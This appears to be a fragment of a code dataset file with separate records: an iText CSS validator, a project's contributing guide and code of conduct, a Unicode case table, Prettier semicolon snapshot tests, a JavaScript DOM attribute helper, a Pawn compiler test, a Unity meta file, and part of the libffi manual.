applications.\nThese activities include: offering paid services to customers as an ASP,\nserving PDFs on the fly in a web application, shipping iText with a closed\nsource product.\n\nFor more information, please contact iText Software Corp. at this\naddress: sales@itextpdf.com\n*/\nusing System.Collections.Generic;\nusing iText.IO.Util;\nusing iText.StyledXmlParser.Css;\nusing iText.StyledXmlParser.Css.Validate;\n\nnamespace iText.StyledXmlParser.Css.Validate.Impl.Declaration {\n /// \n /// \n /// implementation in case multiple types have to be checked.\n /// \n public class MultiTypeDeclarationValidator : ICssDeclarationValidator {\n /// The allowed data types.\n private IList allowedTypes;\n\n /// \n /// Creates a new\n /// \n /// instance.\n /// \n /// the allowed types\n public MultiTypeDeclarationValidator(params ICssDataTypeValidator[] allowedTypes) {\n this.allowedTypes = JavaUtil.ArraysAsList(allowedTypes);\n }\n\n /* (non-Javadoc)\n * @see com.itextpdf.styledxmlparser.css.validate.ICssDeclarationValidator#isValid(com.itextpdf.styledxmlparser.css.CssDeclaration)\n */\n public virtual bool IsValid(CssDeclaration cssDeclaration) {\n foreach (ICssDataTypeValidator dTypeValidator in allowedTypes) {\n if (dTypeValidator.IsValid(cssDeclaration.GetExpression())) {\n return true;\n }\n }\n return false;\n }\n }\n}\n"} {"text": "# Contributing\n\nWe want this community to be friendly and respectful to each other. Please follow it in all your interactions with the project.\n\n## Development workflow\n\nTo get started with the project, run `yarn bootstrap` in the root directory to install the required dependencies for each package:\n\n```sh\nyarn bootstrap\n```\n\nWhile developing, you can run the [example app](/example/) to test your changes.\n\nTo start the packager:\n\n```sh\nyarn example start\n```\n\nTo run the example app on Android:\n\n```sh\nyarn example android\n```\n\nTo run the example app on iOS:\n\n```sh\nyarn example android\n```\n\nMake sure your code passes TypeScript and ESLint. Run the following to verify:\n\n```sh\nyarn typescript\nyarn lint\n```\n\nTo fix formatting errors, run the following:\n\n```sh\nyarn lint --fix\n```\n\nRemember to add tests for your change if possible. Run the unit tests by:\n\n```sh\nyarn test\n```\n\n### Commit message convention\n\nWe follow the [conventional commits specification](https://www.conventionalcommits.org/en) for our commit messages:\n\n- `fix`: bug fixes, e.g. fix crash due to deprecated method.\n- `feat`: new features, e.g. add new method to the module.\n- `refactor`: code refactor, e.g. migrate from class components to hooks.\n- `docs`: changes into documentation, e.g. add usage example for the module..\n- `test`: adding or updating tests, eg add integration tests using detox.\n- `chore`: tooling changes, e.g. change CI config.\n\nOur pre-commit hooks verify that your commit message matches this format when committing.\n\n### Linting and tests\n\n[ESLint](https://eslint.org/), [Prettier](https://prettier.io/), [TypeScript](https://www.typescriptlang.org/)\n\nWe use [TypeScript](https://www.typescriptlang.org/) for type checking, [ESLint](https://eslint.org/) with [Prettier](https://prettier.io/) for linting and formatting the code, and [Jest](https://jestjs.io/) for testing.\n\nOur pre-commit hooks verify that the linter and tests pass when committing.\n\n### Scripts\n\nThe `package.json` file contains various scripts for common tasks:\n\n- `yarn bootstrap`: setup project by installing all dependencies and pods.\n- `yarn typescript`: type-check files with TypeScript.\n- `yarn lint`: lint files with ESLint.\n- `yarn test`: run unit tests with Jest.\n- `yarn example start`: start the Metro server for the example app.\n- `yarn example android`: run the example app on Android.\n- `yarn example ios`: run the example app on iOS.\n\n### Sending a pull request\n\n> **Working on your first pull request?** You can learn how from this _free_ series: [How to Contribute to an Open Source Project on GitHub](https://egghead.io/series/how-to-contribute-to-an-open-source-project-on-github).\n\nWhen you're sending a pull request:\n\n- Prefer small pull requests focused on one change.\n- Verify that linters and tests are passing.\n- Review the documentation to make sure it looks good.\n- Follow the pull request template when opening a pull request.\n- For pull requests that change the API or implementation, discuss with maintainers first by opening an issue.\n\n## Code of Conduct\n\n### Our Pledge\n\nWe as members, contributors, and leaders pledge to make participation in our community a harassment-free experience for everyone, regardless of age, body size, visible or invisible disability, ethnicity, sex characteristics, gender identity and expression, level of experience, education, socio-economic status, nationality, personal appearance, race, religion, or sexual identity and orientation.\n\nWe pledge to act and interact in ways that contribute to an open, welcoming, diverse, inclusive, and healthy community.\n\n### Our Standards\n\nExamples of behavior that contributes to a positive environment for our community include:\n\n- Demonstrating empathy and kindness toward other people\n- Being respectful of differing opinions, viewpoints, and experiences\n- Giving and gracefully accepting constructive feedback\n- Accepting responsibility and apologizing to those affected by our mistakes, and learning from the experience\n- Focusing on what is best not just for us as individuals, but for the overall community\n\nExamples of unacceptable behavior include:\n\n- The use of sexualized language or imagery, and sexual attention or\n advances of any kind\n- Trolling, insulting or derogatory comments, and personal or political attacks\n- Public or private harassment\n- Publishing others' private information, such as a physical or email\n address, without their explicit permission\n- Other conduct which could reasonably be considered inappropriate in a\n professional setting\n\n### Enforcement Responsibilities\n\nCommunity leaders are responsible for clarifying and enforcing our standards of acceptable behavior and will take appropriate and fair corrective action in response to any behavior that they deem inappropriate, threatening, offensive, or harmful.\n\nCommunity leaders have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, and will communicate reasons for moderation decisions when appropriate.\n\n### Scope\n\nThis Code of Conduct applies within all community spaces, and also applies when an individual is officially representing the community in public spaces. Examples of representing our community include using an official e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event.\n\n### Enforcement\n\nInstances of abusive, harassing, or otherwise unacceptable behavior may be reported to the community leaders responsible for enforcement at [INSERT CONTACT METHOD]. All complaints will be reviewed and investigated promptly and fairly.\n\nAll community leaders are obligated to respect the privacy and security of the reporter of any incident.\n\n### Enforcement Guidelines\n\nCommunity leaders will follow these Community Impact Guidelines in determining the consequences for any action they deem in violation of this Code of Conduct:\n\n#### 1. Correction\n\n**Community Impact**: Use of inappropriate language or other behavior deemed unprofessional or unwelcome in the community.\n\n**Consequence**: A private, written warning from community leaders, providing clarity around the nature of the violation and an explanation of why the behavior was inappropriate. A public apology may be requested.\n\n#### 2. Warning\n\n**Community Impact**: A violation through a single incident or series of actions.\n\n**Consequence**: A warning with consequences for continued behavior. No interaction with the people involved, including unsolicited interaction with those enforcing the Code of Conduct, for a specified period of time. This includes avoiding interactions in community spaces as well as external channels like social media. Violating these terms may lead to a temporary or permanent ban.\n\n#### 3. Temporary Ban\n\n**Community Impact**: A serious violation of community standards, including sustained inappropriate behavior.\n\n**Consequence**: A temporary ban from any sort of interaction or public communication with the community for a specified period of time. No public or private interaction with the people involved, including unsolicited interaction with those enforcing the Code of Conduct, is allowed during this period. Violating these terms may lead to a permanent ban.\n\n#### 4. Permanent Ban\n\n**Community Impact**: Demonstrating a pattern of violation of community standards, including sustained inappropriate behavior, harassment of an individual, or aggression toward or disparagement of classes of individuals.\n\n**Consequence**: A permanent ban from any sort of public interaction within the community.\n\n### Attribution\n\nThis Code of Conduct is adapted from the [Contributor Covenant][homepage], version 2.0,\navailable at https://www.contributor-covenant.org/version/2/0/code_of_conduct.html.\n\nCommunity Impact Guidelines were inspired by [Mozilla's code of conduct enforcement ladder](https://github.com/mozilla/diversity).\n\n[homepage]: https://www.contributor-covenant.org\n\nFor answers to common questions about this code of conduct, see the FAQ at\nhttps://www.contributor-covenant.org/faq. Translations are available at https://www.contributor-covenant.org/translations.\n"} {"text": " 8486, 'status' => 'C', 'lower' => array(969)); /* OHM SIGN */\n$config['2100_214f'][] = array('upper' => 8490, 'status' => 'C', 'lower' => array(107)); /* KELVIN SIGN */\n$config['2100_214f'][] = array('upper' => 8491, 'status' => 'C', 'lower' => array(229)); /* ANGSTROM SIGN */\n$config['2100_214f'][] = array('upper' => 8498, 'status' => 'C', 'lower' => array(8526)); /* TURNED CAPITAL F */\n"} {"text": " {}; // The semicolon is *not* necessary\n x(){}\n}\nclass C3 {\n set; // The semicolon *is* necessary\n x(){}\n}\nclass C4 {\n set = () => {}; // The semicolon is *not* necessary\n x(){}\n}\n\n\n\nclass A {\n a = 0;\n [b](){}\n\n c = 0;\n *d(){}\n\n e = 0;\n [f] = 0\n\n // none of the semicolons above this comment can be omitted.\n // none of the semicolons below this comment are necessary.\n\n q() {};\n [h](){}\n\n p() {};\n *i(){}\n\n a = 1;\n get ['y']() {}\n\n a = 1;\n static ['y']() {}\n\n a = 1;\n set ['z'](z) {}\n\n a = 1;\n async ['a']() {}\n\n a = 1;\n async *g() {}\n\n a = 0;\n b = 1;\n}\n\nclass A {\n a = 0;\n [b](){}\n\n c = 0;\n *d(){}\n\n e = 0;\n [f] = 0\n\n // none of the semicolons above this comment can be omitted.\n // none of the semicolons below this comment are necessary.\n\n q() {};\n [h](){}\n\n p() {};\n *i(){}\n\n a = 1;\n get ['y']() {}\n\n a = 1;\n static ['y']() {}\n\n a = 1;\n set ['z'](z) {}\n\n a = 1;\n async ['a']() {}\n\n a = 1;\n async *g() {}\n\n a = 0;\n b = 1;\n}\n\n// being first/last shouldn't break things\nclass G1 {\n x = 1\n}\nclass G2 {\n x() {}\n}\nclass G3 {\n *x() {}\n}\nclass G4 {\n [x] = 1\n}\n\n=====================================output=====================================\n// TODO: upgrade parser\n// class A {\n// async; // The semicolon is *not* necessary\n// x(){}\n// }\n// class B {\n// static; // The semicolon *is* necessary\n// x(){}\n// }\n\nclass C1 {\n get; // The semicolon *is* necessary\n x() {}\n}\nclass C2 {\n get = () => {} // The semicolon is *not* necessary\n x() {}\n}\nclass C3 {\n set; // The semicolon *is* necessary\n x() {}\n}\nclass C4 {\n set = () => {} // The semicolon is *not* necessary\n x() {}\n}\n\nclass A {\n a = 0;\n [b]() {}\n\n c = 0;\n *d() {}\n\n e = 0;\n [f] = 0\n\n // none of the semicolons above this comment can be omitted.\n // none of the semicolons below this comment are necessary.\n\n q() {}\n [h]() {}\n\n p() {}\n *i() {}\n\n a = 1\n get [\"y\"]() {}\n\n a = 1\n static [\"y\"]() {}\n\n a = 1\n set [\"z\"](z) {}\n\n a = 1\n async [\"a\"]() {}\n\n a = 1\n async *g() {}\n\n a = 0\n b = 1\n}\n\nclass A {\n a = 0;\n [b]() {}\n\n c = 0;\n *d() {}\n\n e = 0;\n [f] = 0\n\n // none of the semicolons above this comment can be omitted.\n // none of the semicolons below this comment are necessary.\n\n q() {}\n [h]() {}\n\n p() {}\n *i() {}\n\n a = 1\n get [\"y\"]() {}\n\n a = 1\n static [\"y\"]() {}\n\n a = 1\n set [\"z\"](z) {}\n\n a = 1\n async [\"a\"]() {}\n\n a = 1\n async *g() {}\n\n a = 0\n b = 1\n}\n\n// being first/last shouldn't break things\nclass G1 {\n x = 1\n}\nclass G2 {\n x() {}\n}\nclass G3 {\n *x() {}\n}\nclass G4 {\n [x] = 1\n}\n\n================================================================================\n`;\n\nexports[`class.js format 1`] = `\n====================================options=====================================\nparsers: [\"babel\", \"flow\"]\nprintWidth: 80\n | printWidth\n=====================================input======================================\n// TODO: upgrade parser\n// class A {\n// async; // The semicolon is *not* necessary\n// x(){}\n// }\n// class B {\n// static; // The semicolon *is* necessary\n// x(){}\n// }\n\nclass C1 {\n get; // The semicolon *is* necessary\n x(){}\n}\nclass C2 {\n get = () => {}; // The semicolon is *not* necessary\n x(){}\n}\nclass C3 {\n set; // The semicolon *is* necessary\n x(){}\n}\nclass C4 {\n set = () => {}; // The semicolon is *not* necessary\n x(){}\n}\n\n\n\nclass A {\n a = 0;\n [b](){}\n\n c = 0;\n *d(){}\n\n e = 0;\n [f] = 0\n\n // none of the semicolons above this comment can be omitted.\n // none of the semicolons below this comment are necessary.\n\n q() {};\n [h](){}\n\n p() {};\n *i(){}\n\n a = 1;\n get ['y']() {}\n\n a = 1;\n static ['y']() {}\n\n a = 1;\n set ['z'](z) {}\n\n a = 1;\n async ['a']() {}\n\n a = 1;\n async *g() {}\n\n a = 0;\n b = 1;\n}\n\nclass A {\n a = 0;\n [b](){}\n\n c = 0;\n *d(){}\n\n e = 0;\n [f] = 0\n\n // none of the semicolons above this comment can be omitted.\n // none of the semicolons below this comment are necessary.\n\n q() {};\n [h](){}\n\n p() {};\n *i(){}\n\n a = 1;\n get ['y']() {}\n\n a = 1;\n static ['y']() {}\n\n a = 1;\n set ['z'](z) {}\n\n a = 1;\n async ['a']() {}\n\n a = 1;\n async *g() {}\n\n a = 0;\n b = 1;\n}\n\n// being first/last shouldn't break things\nclass G1 {\n x = 1\n}\nclass G2 {\n x() {}\n}\nclass G3 {\n *x() {}\n}\nclass G4 {\n [x] = 1\n}\n\n=====================================output=====================================\n// TODO: upgrade parser\n// class A {\n// async; // The semicolon is *not* necessary\n// x(){}\n// }\n// class B {\n// static; // The semicolon *is* necessary\n// x(){}\n// }\n\nclass C1 {\n get; // The semicolon *is* necessary\n x() {}\n}\nclass C2 {\n get = () => {}; // The semicolon is *not* necessary\n x() {}\n}\nclass C3 {\n set; // The semicolon *is* necessary\n x() {}\n}\nclass C4 {\n set = () => {}; // The semicolon is *not* necessary\n x() {}\n}\n\nclass A {\n a = 0;\n [b]() {}\n\n c = 0;\n *d() {}\n\n e = 0;\n [f] = 0;\n\n // none of the semicolons above this comment can be omitted.\n // none of the semicolons below this comment are necessary.\n\n q() {}\n [h]() {}\n\n p() {}\n *i() {}\n\n a = 1;\n get [\"y\"]() {}\n\n a = 1;\n static [\"y\"]() {}\n\n a = 1;\n set [\"z\"](z) {}\n\n a = 1;\n async [\"a\"]() {}\n\n a = 1;\n async *g() {}\n\n a = 0;\n b = 1;\n}\n\nclass A {\n a = 0;\n [b]() {}\n\n c = 0;\n *d() {}\n\n e = 0;\n [f] = 0;\n\n // none of the semicolons above this comment can be omitted.\n // none of the semicolons below this comment are necessary.\n\n q() {}\n [h]() {}\n\n p() {}\n *i() {}\n\n a = 1;\n get [\"y\"]() {}\n\n a = 1;\n static [\"y\"]() {}\n\n a = 1;\n set [\"z\"](z) {}\n\n a = 1;\n async [\"a\"]() {}\n\n a = 1;\n async *g() {}\n\n a = 0;\n b = 1;\n}\n\n// being first/last shouldn't break things\nclass G1 {\n x = 1;\n}\nclass G2 {\n x() {}\n}\nclass G3 {\n *x() {}\n}\nclass G4 {\n [x] = 1;\n}\n\n================================================================================\n`;\n\nexports[`comments.js - {\"semi\":false} format 1`] = `\n====================================options=====================================\nparsers: [\"babel\", \"flow\"]\nprintWidth: 80\nsemi: false\n | printWidth\n=====================================input======================================\nlet error = new Error(response.statusText);\n// comment\n[].response = response\n\nx;\n\n/* comment */ [].response = response\n\nx;\n\n[].response = response; /* comment */\n\n=====================================output=====================================\nlet error = new Error(response.statusText)\n// comment\n;[].response = response\n\nx\n\n/* comment */ ;[].response = response\n\nx\n\n;[].response = response /* comment */\n\n================================================================================\n`;\n\nexports[`comments.js format 1`] = `\n====================================options=====================================\nparsers: [\"babel\", \"flow\"]\nprintWidth: 80\n | printWidth\n=====================================input======================================\nlet error = new Error(response.statusText);\n// comment\n[].response = response\n\nx;\n\n/* comment */ [].response = response\n\nx;\n\n[].response = response; /* comment */\n\n=====================================output=====================================\nlet error = new Error(response.statusText);\n// comment\n[].response = response;\n\nx;\n\n/* comment */ [].response = response;\n\nx;\n\n[].response = response; /* comment */\n\n================================================================================\n`;\n\nexports[`issue2006.js - {\"semi\":false} format 1`] = `\n====================================options=====================================\nparsers: [\"babel\", \"flow\"]\nprintWidth: 80\nsemi: false\n | printWidth\n=====================================input======================================\nswitch (n) {\n case 11:\n var c = a.e;\n (i.a += Ga(c.e)), F(i, c.i, 0);\n}\n\nvar c = a.e;\n(i.a += Ga(c.e)), F(i, c.i, 0);\n\n=====================================output=====================================\nswitch (n) {\n case 11:\n var c = a.e\n ;(i.a += Ga(c.e)), F(i, c.i, 0)\n}\n\nvar c = a.e\n;(i.a += Ga(c.e)), F(i, c.i, 0)\n\n================================================================================\n`;\n\nexports[`issue2006.js format 1`] = `\n====================================options=====================================\nparsers: [\"babel\", \"flow\"]\nprintWidth: 80\n | printWidth\n=====================================input======================================\nswitch (n) {\n case 11:\n var c = a.e;\n (i.a += Ga(c.e)), F(i, c.i, 0);\n}\n\nvar c = a.e;\n(i.a += Ga(c.e)), F(i, c.i, 0);\n\n=====================================output=====================================\nswitch (n) {\n case 11:\n var c = a.e;\n (i.a += Ga(c.e)), F(i, c.i, 0);\n}\n\nvar c = a.e;\n(i.a += Ga(c.e)), F(i, c.i, 0);\n\n================================================================================\n`;\n\nexports[`no-semi.js - {\"semi\":false} format 1`] = `\n====================================options=====================================\nparsers: [\"babel\", \"flow\"]\nprintWidth: 80\nsemi: false\n | printWidth\n=====================================input======================================\n\n// with preexisting semi\n\nx; [1, 2, 3].forEach(fn)\nx; [a, b, ...c] = [1, 2]\nx; /r/i.test('r')\nx; +1\nx; - 1\nx; ('h' + 'i').repeat(10)\nx; (1, 2)\nx; (() => {})()\nx; ({ a: 1 }).entries()\nx; ({ a: 1 }).entries()\nx; \nx; \\`string\\`\nx; (x, y) => x\n\n// doesn't have to be preceded by a semicolon\n\nclass X {} [1, 2, 3].forEach(fn)\n\n\n// don't semicolon if it doesn't start statement\n\nif (true) (() => {})()\n\n\n// check indentation\n\nif (true) {\n x; (() => {})()\n}\n\n// check statement clauses\n\ndo break; while (false)\nif (true) do break; while (false)\n\nif (true) 1; else 2\nfor (;;) ;\nfor (x of y) ;\n\ndebugger\n\n// check that it doesn't break non-ASI\n\n1\n- 1\n\n1\n+ 1\n\n1\n/ 1\n\narr\n[0]\n\nfn\n(x)\n\n!1\n\n1\n< 1\n\ntag\n\\`string\\`\n\nx; x => x\n\nx; (a || b).c++\n\nx; ++(a || b).c\n\nwhile (false)\n (function(){}())\n\naReallyLongLine012345678901234567890123456789012345678901234567890123456789 *\n (b + c)\n\n=====================================output=====================================\n// with preexisting semi\n\nx\n;[1, 2, 3].forEach(fn)\nx\n;[a, b, ...c] = [1, 2]\nx\n;/r/i.test(\"r\")\nx\n;+1\nx\n;-1\nx\n;(\"h\" + \"i\").repeat(10)\nx\n1, 2\nx\n;(() => {})()\nx\n;({ a: 1 }.entries())\nx\n;({ a: 1 }.entries())\nx\n;\nx\n;\\`string\\`\nx\n;(x, y) => x\n\n// doesn't have to be preceded by a semicolon\n\nclass X {}\n;[1, 2, 3].forEach(fn)\n\n// don't semicolon if it doesn't start statement\n\nif (true) (() => {})()\n\n// check indentation\n\nif (true) {\n x\n ;(() => {})()\n}\n\n// check statement clauses\n\ndo break\nwhile (false)\nif (true)\n do break\n while (false)\n\nif (true) 1\nelse 2\nfor (;;);\nfor (x of y);\n\ndebugger\n\n// check that it doesn't break non-ASI\n\n1 - 1\n\n1 + 1\n\n1 / 1\n\narr[0]\n\nfn(x)\n\n!1\n\n1 < 1\n\ntag\\`string\\`\n\nx\n;(x) => x\n\nx\n;(a || b).c++\n\nx\n++(a || b).c\n\nwhile (false) (function () {})()\n\naReallyLongLine012345678901234567890123456789012345678901234567890123456789 *\n (b + c)\n\n================================================================================\n`;\n\nexports[`no-semi.js format 1`] = `\n====================================options=====================================\nparsers: [\"babel\", \"flow\"]\nprintWidth: 80\n | printWidth\n=====================================input======================================\n\n// with preexisting semi\n\nx; [1, 2, 3].forEach(fn)\nx; [a, b, ...c] = [1, 2]\nx; /r/i.test('r')\nx; +1\nx; - 1\nx; ('h' + 'i').repeat(10)\nx; (1, 2)\nx; (() => {})()\nx; ({ a: 1 }).entries()\nx; ({ a: 1 }).entries()\nx; \nx; \\`string\\`\nx; (x, y) => x\n\n// doesn't have to be preceded by a semicolon\n\nclass X {} [1, 2, 3].forEach(fn)\n\n\n// don't semicolon if it doesn't start statement\n\nif (true) (() => {})()\n\n\n// check indentation\n\nif (true) {\n x; (() => {})()\n}\n\n// check statement clauses\n\ndo break; while (false)\nif (true) do break; while (false)\n\nif (true) 1; else 2\nfor (;;) ;\nfor (x of y) ;\n\ndebugger\n\n// check that it doesn't break non-ASI\n\n1\n- 1\n\n1\n+ 1\n\n1\n/ 1\n\narr\n[0]\n\nfn\n(x)\n\n!1\n\n1\n< 1\n\ntag\n\\`string\\`\n\nx; x => x\n\nx; (a || b).c++\n\nx; ++(a || b).c\n\nwhile (false)\n (function(){}())\n\naReallyLongLine012345678901234567890123456789012345678901234567890123456789 *\n (b + c)\n\n=====================================output=====================================\n// with preexisting semi\n\nx;\n[1, 2, 3].forEach(fn);\nx;\n[a, b, ...c] = [1, 2];\nx;\n/r/i.test(\"r\");\nx;\n+1;\nx;\n-1;\nx;\n(\"h\" + \"i\").repeat(10);\nx;\n1, 2;\nx;\n(() => {})();\nx;\n({ a: 1 }.entries());\nx;\n({ a: 1 }.entries());\nx;\n;\nx;\n\\`string\\`;\nx;\n(x, y) => x;\n\n// doesn't have to be preceded by a semicolon\n\nclass X {}\n[1, 2, 3].forEach(fn);\n\n// don't semicolon if it doesn't start statement\n\nif (true) (() => {})();\n\n// check indentation\n\nif (true) {\n x;\n (() => {})();\n}\n\n// check statement clauses\n\ndo break;\nwhile (false);\nif (true)\n do break;\n while (false);\n\nif (true) 1;\nelse 2;\nfor (;;);\nfor (x of y);\n\ndebugger;\n\n// check that it doesn't break non-ASI\n\n1 - 1;\n\n1 + 1;\n\n1 / 1;\n\narr[0];\n\nfn(x);\n\n!1;\n\n1 < 1;\n\ntag\\`string\\`;\n\nx;\n(x) => x;\n\nx;\n(a || b).c++;\n\nx;\n++(a || b).c;\n\nwhile (false) (function () {})();\n\naReallyLongLine012345678901234567890123456789012345678901234567890123456789 *\n (b + c);\n\n================================================================================\n`;\n"} {"text": "/**\n * ESUI (Enterprise Simple UI library)\n * Copyright 2013 Baidu Inc. All rights reserved.\n *\n * @ignore\n * @file DOM属性相关基础库\n * @author otakustay\n */\n define(\n function (require) {\n var dom = require('./dom');\n\n /**\n * @override lib\n */\n var lib = {};\n\n /**\n * 检查元素是否有指定的属性\n *\n * @param {HTMLElement} element 指定元素\n * @param {string} name 指定属性名称\n * @return {boolean}\n */\n lib.hasAttribute = function (element, name) {\n if (element.hasAttribute) {\n return element.hasAttribute(name);\n }\n else {\n return element.attributes\n && element.attributes[name]\n && element.attributes[name].specified;\n }\n };\n\n // 提供给 setAttribute 与 getAttribute 方法作名称转换使用\n var ATTRIBUTE_NAME_MAPPING = (function () {\n var result = {\n cellpadding: 'cellPadding',\n cellspacing: 'cellSpacing',\n colspan: 'colSpan',\n rowspan: 'rowSpan',\n valign: 'vAlign',\n usemap: 'useMap',\n frameborder: 'frameBorder'\n };\n\n var div = document.createElement('div');\n div.innerHTML = '';\n var label = div.getElementsByTagName('label')[0];\n\n if (label.getAttribute('className') === 'test') {\n result['class'] = 'className';\n }\n else {\n result.className = 'class';\n }\n\n if (label.getAttribute('for') === 'test') {\n result.htmlFor = 'for';\n }\n else {\n result['for'] = 'htmlFor';\n }\n\n return result;\n }());\n\n\n /**\n * 设置元素属性,会对某些值做转换\n *\n * @param {HTMLElement | string} element 目标元素或其id\n * @param {string} key 要设置的属性名\n * @param {string} value 要设置的属性值\n * @return {HTMLElement} 目标元素\n */\n lib.setAttribute = function (element, key, value) {\n element = dom.g(element);\n\n if (key === 'style') {\n element.style.cssText = value;\n }\n else {\n key = ATTRIBUTE_NAME_MAPPING[key] || key;\n element.setAttribute(key, value);\n }\n\n return element;\n };\n\n /**\n * 获取目标元素的属性值\n *\n * @param {HTMLElement | string} element 目标元素或其id\n * @param {string} key 要获取的属性名称\n * @return {string | null} 目标元素的attribute值,获取不到时返回 null\n */\n lib.getAttribute = function (element, key) {\n element = dom.g(element);\n\n if (key === 'style') {\n return element.style.cssText;\n }\n\n key = ATTRIBUTE_NAME_MAPPING[key] || key;\n return element.getAttribute(key);\n };\n\n /**\n * 移除元素属性\n *\n * @param {HTMLElement | string} element 目标元素或其id\n * @param {string} key 属性名称\n */\n lib.removeAttribute = function (element, key) {\n element = dom.g(element);\n\n key = ATTRIBUTE_NAME_MAPPING[key] || key;\n element.removeAttribute(key);\n };\n\n return lib;\n }\n);\n"} {"text": "{\n 'test_type': 'output_check',\n 'errors': \"\"\"\n__emit_p6.pwn(23) : error 076: syntax error in the expression, or invalid function call\n__emit_p6.pwn(24) : error 076: syntax error in the expression, or invalid function call\n__emit_p6.pwn(25) : error 033: array must be indexed (variable \"local_array\")\n__emit_p6.pwn(26) : error 033: array must be indexed (variable \"local_refarray\")\n__emit_p6.pwn(45) : error 022: must be lvalue (non-constant)\n__emit_p6.pwn(46) : error 022: must be lvalue (non-constant)\n__emit_p6.pwn(47) : error 022: must be lvalue (non-constant)\n__emit_p6.pwn(48) : error 022: must be lvalue (non-constant)\n__emit_p6.pwn(49) : error 022: must be lvalue (non-constant)\n__emit_p6.pwn(50) : error 033: array must be indexed (variable \"local_array\")\n__emit_p6.pwn(51) : error 033: array must be indexed (variable \"local_refarray\")\n__emit_p6.pwn(71) : error 022: must be lvalue (non-constant)\n__emit_p6.pwn(72) : error 022: must be lvalue (non-constant)\n__emit_p6.pwn(73) : error 022: must be lvalue (non-constant)\n__emit_p6.pwn(74) : error 022: must be lvalue (non-constant)\n__emit_p6.pwn(75) : error 033: array must be indexed (variable \"local_array\")\n__emit_p6.pwn(76) : error 033: array must be indexed (variable \"local_refarray\")\n__emit_p6.pwn(98) : error 076: syntax error in the expression, or invalid function call\n__emit_p6.pwn(99) : error 076: syntax error in the expression, or invalid function call\n__emit_p6.pwn(100) : error 033: array must be indexed (variable \"local_array\")\n__emit_p6.pwn(101) : error 033: array must be indexed (variable \"local_refarray\")\n\"\"\"\n}\n"} {"text": "
\n
\n \n
\n
\n"} {"text": "fileFormatVersion: 2\nguid: a5ebb11c6fc3a2f498bd89593f7744aa\nMonoImporter:\n externalObjects: {}\n serializedVersion: 2\n defaultReferences: []\n executionOrder: 0\n icon: {instanceID: 0}\n userData: \n assetBundleName: \n assetBundleVariant: \n"} {"text": "\\input texinfo @c -*-texinfo-*-\n@c %**start of header\n@setfilename libffi.info\n@settitle libffi\n@setchapternewpage off\n@c %**end of header\n\n@c Merge the standard indexes into a single one.\n@syncodeindex fn cp\n@syncodeindex vr cp\n@syncodeindex ky cp\n@syncodeindex pg cp\n@syncodeindex tp cp\n\n@include version.texi\n\n@copying\n\nThis manual is for Libffi, a portable foreign-function interface\nlibrary.\n\nCopyright @copyright{} 2008, 2010, 2011 Red Hat, Inc.\n\n@quotation\nPermission is granted to copy, distribute and/or modify this document\nunder the terms of the GNU General Public License as published by the\nFree Software Foundation; either version 2, or (at your option) any\nlater version. A copy of the license is included in the\nsection entitled ``GNU General Public License''.\n\n@end quotation\n@end copying\n\n@dircategory Development\n@direntry\n* libffi: (libffi). Portable foreign-function interface library.\n@end direntry\n\n@titlepage\n@title Libffi\n@page\n@vskip 0pt plus 1filll\n@insertcopying\n@end titlepage\n\n\n@ifnottex\n@node Top\n@top libffi\n\n@insertcopying\n\n@menu\n* Introduction:: What is libffi?\n* Using libffi:: How to use libffi.\n* Missing Features:: Things libffi can't do.\n* Index:: Index.\n@end menu\n\n@end ifnottex\n\n\n@node Introduction\n@chapter What is libffi?\n\nCompilers for high level languages generate code that follow certain\nconventions. These conventions are necessary, in part, for separate\ncompilation to work. One such convention is the @dfn{calling\nconvention}. The calling convention is a set of assumptions made by\nthe compiler about where function arguments will be found on entry to\na function. A calling convention also specifies where the return\nvalue for a function is found. The calling convention is also\nsometimes called the @dfn{ABI} or @dfn{Application Binary Interface}.\n@cindex calling convention\n@cindex ABI\n@cindex Application Binary Interface\n\nSome programs may not know at the time of compilation what arguments\nare to be passed to a function. For instance, an interpreter may be\ntold at run-time about the number and types of arguments used to call\na given function. @samp{Libffi} can be used in such programs to\nprovide a bridge from the interpreter program to compiled code.\n\nThe @samp{libffi} library provides a portable, high level programming\ninterface to various calling conventions. This allows a programmer to\ncall any function specified by a call interface description at run\ntime.\n\n@acronym{FFI} stands for Foreign Function Interface. A foreign\nfunction interface is the popular name for the interface that allows\ncode written in one language to call code written in another language.\nThe @samp{libffi} library really only provides the lowest, machine\ndependent layer of a fully featured foreign function interface. A\nlayer must exist above @samp{libffi} that handles type conversions for\nvalues passed between the two languages.\n@cindex FFI\n@cindex Foreign Function Interface\n\n\n@node Using libffi\n@chapter Using libffi\n\n@menu\n* The Basics:: The basic libffi API.\n* Simple Example:: A simple example.\n* Types:: libffi type descriptions.\n* Multiple ABIs:: Different passing styles on one platform.\n* The Closure API:: Writing a generic function.\n* Closure Example:: A closure example.\n@end menu\n\n\n@node The Basics\n@section The Basics\n\n@samp{Libffi} assumes that you have a pointer to the function you wish\nto call and that you know the number and types of arguments to pass\nit, as well as the return type of the function.\n\nThe first thing you must do is create an @code{ffi_cif} object that\nmatches the signature of the function you wish to call. This is a\nseparate step because it is common to make multiple calls using a\nsingle @code{ffi_cif}. The @dfn{cif} in @code{ffi_cif} stands for\nCall InterFace. To prepare a call interface object, use the function\n@code{ffi_prep_cif}.\n@cindex cif\n\n@findex ffi_prep_cif\n@defun ffi_status ffi_prep_cif (ffi_cif *@var{cif}, ffi_abi @var{abi}, unsigned int @var{nargs}, ffi_type *@var{rtype}, ffi_type **@var{argtypes})\nThis initializes @var{cif} according to the given parameters.\n\n@var{abi} is the ABI to use; normally @code{FFI_DEFAULT_ABI} is what\nyou want. @ref{Multiple ABIs} for more information.\n\n@var{nargs} is the number of arguments that this function accepts.\n\n@var{rtype} is a pointer to an @code{ffi_type} structure that\ndescribes the return type of the function. @xref{Types}.\n\n@var{argtypes} is a vector of @code{ffi_type} pointers.\n@var{argtypes} must have @var{nargs} elements. If @var{nargs} is 0,\nthis argument is ignored.\n\n@code{ffi_prep_cif} returns a @code{libffi} status code, of type\n@code{ffi_status}. This will be either @code{FFI_OK} if everything\nworked properly; @code{FFI_BAD_TYPEDEF} if one of the @code{ffi_type}\nobjects is incorrect; or @code{FFI_BAD_ABI} if the @var{abi} parameter\nis invalid.\n@end defun\n\nIf the function being called is variadic (varargs) then\n@code{ffi_prep_cif_var} must be used instead of @code{ffi_prep_cif}.\n\n@findex ffi_prep_cif_var\n@defun ffi_status ffi_prep_cif_var (ffi_cif *@var{cif}, ffi_abi var{abi}, 